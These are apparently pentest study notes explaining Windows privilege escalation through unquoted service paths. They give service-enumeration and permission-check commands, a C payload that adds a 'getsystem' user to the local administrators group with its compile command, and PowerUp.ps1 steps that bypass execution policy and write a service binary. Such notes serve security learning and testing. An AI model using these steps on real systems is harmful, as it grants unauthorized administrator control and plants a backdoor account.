Unquoted Service Paths

An interesting attack vector that can lead to privilege escalation on Windows operating systems revolves around unquoted service paths. We can use this attack when we have Write permissions to a service’s main directory or subdirectories but cannot replace files within them.

Each Windows service maps to an executable file that will be run when the service is started. If the path of this file contains one or more spaces and is not enclosed within quotes, it may be turned into an opportunity for a privilege escalation attack.

When a service is started and a process is created, the Windows CreateProcess function is used. Reviewing the first parameter of the function, lpApplicationName is used to specify the name and optionally the path to the executable file. If the provided string contains spaces and is not enclosed within quotation marks, it can be interpreted in various ways because it is unclear to the function where the file name ends and the arguments begin. To determine this, the function starts interpreting the path from left to right until a space is reached. For every space in the file path, the function uses the preceding part as file name by adding .exe and the rest as arguments.

For Example

The unquoted service binary path C:\Program Files\My Program\My Service\service.exe. When Windows starts the service, it will use the following order to try to start the executable file due to the spaces in the path:

C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My service\service.exe

To Search

PS C:\Users\root> Get-CimInstance -ClassName win32_service | Select Name,State,PathName

Using Cmd

C:\Users\root> wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """

To check if we can start and stop the identified service

PS C:\Users\root> Start-Service VulnService
WARNING: Waiting for service 'VulnService (VulnService)' to start...

PS C:\Users\root> Stop-Service VulnService

How Windows tries to locate the correct path of the unquoted service VulnService

C:\Program.exe
C:\Program Files\Enterprise.exe
C:\Program Files\Enterprise Apps\Current.exe
C:\Program Files\Enterprise Apps\Current Version\VulnServ.exe

To check our access rights in these paths with icacls.

PS C:\Users\Administrator> icacls C:\Users\Administrator
C:\Users\Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                       BUILTIN\Administrators:(OI)(CI)(F)
                       BEAST01\Administrator:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files.

BUILTIN\Users:(OI)(CI)(RX,W) <- This kind of permission

Example Payload

#include <stdlib.h>
int main ()
{
 int i;
 
 i = system ("net user getsystem getsystem /add");
 i = system ("net localgroup administrators getsystem /add");
 
 return 0;
}

x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

Using PowerUp.ps1

PS C:\Users\root> powershell -ep bypass
...
PS C:\Users\root> . .\PowerUp.ps1
PS C:\Users\root> Get-UnquotedService

PS C:\Users\root> Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"
PS C:\Users\root> Restart-Service GammaService